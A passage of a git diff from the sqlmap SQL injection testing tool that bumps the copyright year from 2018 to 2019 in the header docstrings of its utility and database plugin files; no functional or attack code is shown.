928bdeda9bd..8717561f389 100644 --- a/lib/utils/sqlalchemy.py +++ b/lib/utils/sqlalchemy.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/utils/timeout.py b/lib/utils/timeout.py index a50902d9a62..6e585365253 100644 --- a/lib/utils/timeout.py +++ b/lib/utils/timeout.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/utils/versioncheck.py b/lib/utils/versioncheck.py index c78b6954506..7e17f28bc65 100644 --- a/lib/utils/versioncheck.py +++ b/lib/utils/versioncheck.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/utils/xrange.py b/lib/utils/xrange.py index 9ae8e55860b..5cac24310f2 100644 --- a/lib/utils/xrange.py +++ b/lib/utils/xrange.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/__init__.py b/plugins/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/plugins/__init__.py +++ b/plugins/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/__init__.py b/plugins/dbms/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/plugins/dbms/__init__.py +++ b/plugins/dbms/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/access/__init__.py b/plugins/dbms/access/__init__.py index 27da4be82fd..3529701b07d 100644 --- a/plugins/dbms/access/__init__.py +++ b/plugins/dbms/access/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/access/connector.py b/plugins/dbms/access/connector.py index 13dc3c12471..ff10504a217 100644 --- a/plugins/dbms/access/connector.py +++ b/plugins/dbms/access/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/access/enumeration.py b/plugins/dbms/access/enumeration.py index c74aed8bcf4..22276102448 100644 --- a/plugins/dbms/access/enumeration.py +++ b/plugins/dbms/access/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/access/filesystem.py b/plugins/dbms/access/filesystem.py index 8c02c9804aa..7d0006c8d4f 100644 --- a/plugins/dbms/access/filesystem.py +++ b/plugins/dbms/access/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py index ca44557bef1..339edba51ca 100644 --- a/plugins/dbms/access/fingerprint.py +++ b/plugins/dbms/access/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/access/syntax.py b/plugins/dbms/access/syntax.py index b1a5131a7a9..f6cd030efd8 100644 --- a/plugins/dbms/access/syntax.py +++ b/plugins/dbms/access/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/access/takeover.py b/plugins/dbms/access/takeover.py index 651cff65183..e12c4d9adb0 100644 --- a/plugins/dbms/access/takeover.py +++ b/plugins/dbms/access/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/db2/__init__.py b/plugins/dbms/db2/__init__.py index 3f642ab0586..6bf0091cf6a 100644 --- a/plugins/dbms/db2/__init__.py +++ b/plugins/dbms/db2/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/db2/connector.py b/plugins/dbms/db2/connector.py index 73f7ebba47b..a1906dc7c5e 100644 --- a/plugins/dbms/db2/connector.py +++ b/plugins/dbms/db2/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/db2/enumeration.py b/plugins/dbms/db2/enumeration.py index e79d281a863..129ef027896 100644 --- a/plugins/dbms/db2/enumeration.py +++ b/plugins/dbms/db2/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/db2/filesystem.py b/plugins/dbms/db2/filesystem.py index 4699cb9b634..4f0d86be78e 100644 --- a/plugins/dbms/db2/filesystem.py +++ b/plugins/dbms/db2/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/db2/fingerprint.py b/plugins/dbms/db2/fingerprint.py index 364e89d31af..dd6e34af9b9 100644 --- a/plugins/dbms/db2/fingerprint.py +++ b/plugins/dbms/db2/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/db2/syntax.py b/plugins/dbms/db2/syntax.py index 64f08a7c4ea..c0aacd60fd8 100644 --- a/plugins/dbms/db2/syntax.py +++ b/plugins/dbms/db2/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/db2/takeover.py b/plugins/dbms/db2/takeover.py index ba8026e8880..ca204b03495 100644 --- a/plugins/dbms/db2/takeover.py +++ b/plugins/dbms/db2/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/firebird/__init__.py b/plugins/dbms/firebird/__init__.py index 602855ddc3b..f35a4070ecd 100644 --- a/plugins/dbms/firebird/__init__.py +++ b/plugins/dbms/firebird/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/firebird/connector.py b/plugins/dbms/firebird/connector.py index 42e2ea925f1..a38232d4100 100644 --- a/plugins/dbms/firebird/connector.py +++ b/plugins/dbms/firebird/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/firebird/enumeration.py b/plugins/dbms/firebird/enumeration.py index 9d5e915ed8e..406347a5e31 100644 --- a/plugins/dbms/firebird/enumeration.py +++ b/plugins/dbms/firebird/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/firebird/filesystem.py b/plugins/dbms/firebird/filesystem.py index 9b353468691..2ccf0cb8c79 100644 --- a/plugins/dbms/firebird/filesystem.py +++ b/plugins/dbms/firebird/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py index a8f5d7fc92c..40ac7580cec 100644 --- a/plugins/dbms/firebird/fingerprint.py +++ b/plugins/dbms/firebird/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/firebird/syntax.py b/plugins/dbms/firebird/syntax.py index 15767b3a348..7c91e79cf6f 100644 --- a/plugins/dbms/firebird/syntax.py +++ b/plugins/dbms/firebird/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/firebird/takeover.py b/plugins/dbms/firebird/takeover.py index 967f193c6aa..9864414702e 100644 --- a/plugins/dbms/firebird/takeover.py +++ b/plugins/dbms/firebird/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/h2/__init__.py b/plugins/dbms/h2/__init__.py index c35662f6051..b38b098dd12 100644 --- a/plugins/dbms/h2/__init__.py +++ b/plugins/dbms/h2/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/h2/connector.py b/plugins/dbms/h2/connector.py index e9bc44f9edc..54e332c773f 100644 --- a/plugins/dbms/h2/connector.py +++ b/plugins/dbms/h2/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/h2/enumeration.py b/plugins/dbms/h2/enumeration.py index c4f9560a2ea..58e9ec71636 100644 --- a/plugins/dbms/h2/enumeration.py +++ b/plugins/dbms/h2/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/h2/filesystem.py b/plugins/dbms/h2/filesystem.py index b082a335ed5..cfbcee27cd5 100644 --- a/plugins/dbms/h2/filesystem.py +++ b/plugins/dbms/h2/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/h2/fingerprint.py b/plugins/dbms/h2/fingerprint.py index ba36ec1a810..6b6353ecc3b 100644 --- a/plugins/dbms/h2/fingerprint.py +++ b/plugins/dbms/h2/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/h2/syntax.py b/plugins/dbms/h2/syntax.py index aab5e6b6c8f..b98351c593d 100644 --- a/plugins/dbms/h2/syntax.py +++ b/plugins/dbms/h2/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/h2/takeover.py b/plugins/dbms/h2/takeover.py index 28d922d3f19..cb0f53cb271 100644 --- a/plugins/dbms/h2/takeover.py +++ b/plugins/dbms/h2/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/hsqldb/__init__.py b/plugins/dbms/hsqldb/__init__.py index bcbc831641d..c6f9c28f1dc 100644 --- a/plugins/dbms/hsqldb/__init__.py +++ b/plugins/dbms/hsqldb/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/hsqldb/connector.py b/plugins/dbms/hsqldb/connector.py index ee605409f27..7f272fb1eb9 100644 --- a/plugins/dbms/hsqldb/connector.py +++ b/plugins/dbms/hsqldb/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/hsqldb/enumeration.py b/plugins/dbms/hsqldb/enumeration.py index 78d94293d8d..9616d5cf65e 100644 --- a/plugins/dbms/hsqldb/enumeration.py +++ b/plugins/dbms/hsqldb/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/hsqldb/filesystem.py b/plugins/dbms/hsqldb/filesystem.py index de9c14d9593..a8bdfa2a071 100644 --- a/plugins/dbms/hsqldb/filesystem.py +++ b/plugins/dbms/hsqldb/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py index 4fecfa648af..4b1245b40b0 100644 --- a/plugins/dbms/hsqldb/fingerprint.py +++ b/plugins/dbms/hsqldb/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/hsqldb/syntax.py b/plugins/dbms/hsqldb/syntax.py index aab5e6b6c8f..b98351c593d 100644 --- a/plugins/dbms/hsqldb/syntax.py +++ b/plugins/dbms/hsqldb/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/hsqldb/takeover.py b/plugins/dbms/hsqldb/takeover.py index dfa364d34e0..c3b09e34023 100644 --- a/plugins/dbms/hsqldb/takeover.py +++ b/plugins/dbms/hsqldb/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/informix/__init__.py b/plugins/dbms/informix/__init__.py index 0ae21bb3e6c..79a14664b86 100644 --- a/plugins/dbms/informix/__init__.py +++ b/plugins/dbms/informix/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/informix/connector.py b/plugins/dbms/informix/connector.py index f97ec1a7390..75928066671 100644 --- a/plugins/dbms/informix/connector.py +++ b/plugins/dbms/informix/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/informix/enumeration.py b/plugins/dbms/informix/enumeration.py index a41f881b4d8..985963fd924 100644 --- a/plugins/dbms/informix/enumeration.py +++ b/plugins/dbms/informix/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/informix/filesystem.py b/plugins/dbms/informix/filesystem.py index 4699cb9b634..4f0d86be78e 100644 --- a/plugins/dbms/informix/filesystem.py +++ b/plugins/dbms/informix/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/informix/fingerprint.py b/plugins/dbms/informix/fingerprint.py index e6ca564821c..a582a93d6a7 100644 --- a/plugins/dbms/informix/fingerprint.py +++ b/plugins/dbms/informix/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/informix/syntax.py b/plugins/dbms/informix/syntax.py index e3cbf0d6969..2bd9c9e338c 100644 --- a/plugins/dbms/informix/syntax.py +++ b/plugins/dbms/informix/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/informix/takeover.py b/plugins/dbms/informix/takeover.py index ba8026e8880..ca204b03495 100644 --- a/plugins/dbms/informix/takeover.py +++ b/plugins/dbms/informix/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/maxdb/__init__.py b/plugins/dbms/maxdb/__init__.py index 9834a60573c..77e9c5a2556 100644 --- a/plugins/dbms/maxdb/__init__.py +++ b/plugins/dbms/maxdb/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/maxdb/connector.py b/plugins/dbms/maxdb/connector.py index 70295c3c5a0..dd8f76a3a66 100644 --- a/plugins/dbms/maxdb/connector.py +++ b/plugins/dbms/maxdb/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/maxdb/enumeration.py b/plugins/dbms/maxdb/enumeration.py index b61946912cb..ccc09d04d25 100644 --- a/plugins/dbms/maxdb/enumeration.py +++ b/plugins/dbms/maxdb/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/maxdb/filesystem.py b/plugins/dbms/maxdb/filesystem.py index ec4c5c2bab1..45fb2040c47 100644 --- a/plugins/dbms/maxdb/filesystem.py +++ b/plugins/dbms/maxdb/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/maxdb/fingerprint.py b/plugins/dbms/maxdb/fingerprint.py index 0c6cb849662..4875a6e8bea 100644 --- a/plugins/dbms/maxdb/fingerprint.py +++ b/plugins/dbms/maxdb/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/maxdb/syntax.py b/plugins/dbms/maxdb/syntax.py index b946cfb04ad..c950f106474 100644 --- a/plugins/dbms/maxdb/syntax.py +++ b/plugins/dbms/maxdb/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/maxdb/takeover.py b/plugins/dbms/maxdb/takeover.py index 29f0b7ecc18..d3f2172e3bd 100644 --- a/plugins/dbms/maxdb/takeover.py +++ b/plugins/dbms/maxdb/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mssqlserver/__init__.py b/plugins/dbms/mssqlserver/__init__.py index 02a23e967f9..acff62b9903 100644 --- a/plugins/dbms/mssqlserver/__init__.py +++ b/plugins/dbms/mssqlserver/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mssqlserver/connector.py b/plugins/dbms/mssqlserver/connector.py index a39d05d9366..4987bfa43e8 100644 --- a/plugins/dbms/mssqlserver/connector.py +++ b/plugins/dbms/mssqlserver/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py index 7b89d60b4c1..e8a57f9fa42 100644 --- a/plugins/dbms/mssqlserver/enumeration.py +++ b/plugins/dbms/mssqlserver/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py index 6da84d561d1..105c49d2878 100644 --- a/plugins/dbms/mssqlserver/filesystem.py +++ b/plugins/dbms/mssqlserver/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py index 5fbf73680af..065e3bd25ec 100644 --- a/plugins/dbms/mssqlserver/fingerprint.py +++ b/plugins/dbms/mssqlserver/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mssqlserver/syntax.py b/plugins/dbms/mssqlserver/syntax.py index f7f042af0d3..e93427e6330 100644 --- a/plugins/dbms/mssqlserver/syntax.py +++ b/plugins/dbms/mssqlserver/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mssqlserver/takeover.py b/plugins/dbms/mssqlserver/takeover.py index 8d15b478fbf..0377c4d376d 100644 --- a/plugins/dbms/mssqlserver/takeover.py +++ b/plugins/dbms/mssqlserver/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mysql/__init__.py b/plugins/dbms/mysql/__init__.py index b91bbefca74..2d267553831 100644 --- a/plugins/dbms/mysql/__init__.py +++ b/plugins/dbms/mysql/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mysql/connector.py b/plugins/dbms/mysql/connector.py index 184e2eaff18..8b64f322a37 100644 --- a/plugins/dbms/mysql/connector.py +++ b/plugins/dbms/mysql/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mysql/enumeration.py b/plugins/dbms/mysql/enumeration.py index 65370fd4559..c375e891ef2 100644 --- a/plugins/dbms/mysql/enumeration.py +++ b/plugins/dbms/mysql/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py index 1ddc716c7ad..07950d91cb8 100644 --- a/plugins/dbms/mysql/filesystem.py +++ b/plugins/dbms/mysql/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index 092d97d3dcb..e6b69397a70 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mysql/syntax.py b/plugins/dbms/mysql/syntax.py index 61f145e5f52..b2ad286a96d 100644 --- a/plugins/dbms/mysql/syntax.py +++ b/plugins/dbms/mysql/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers 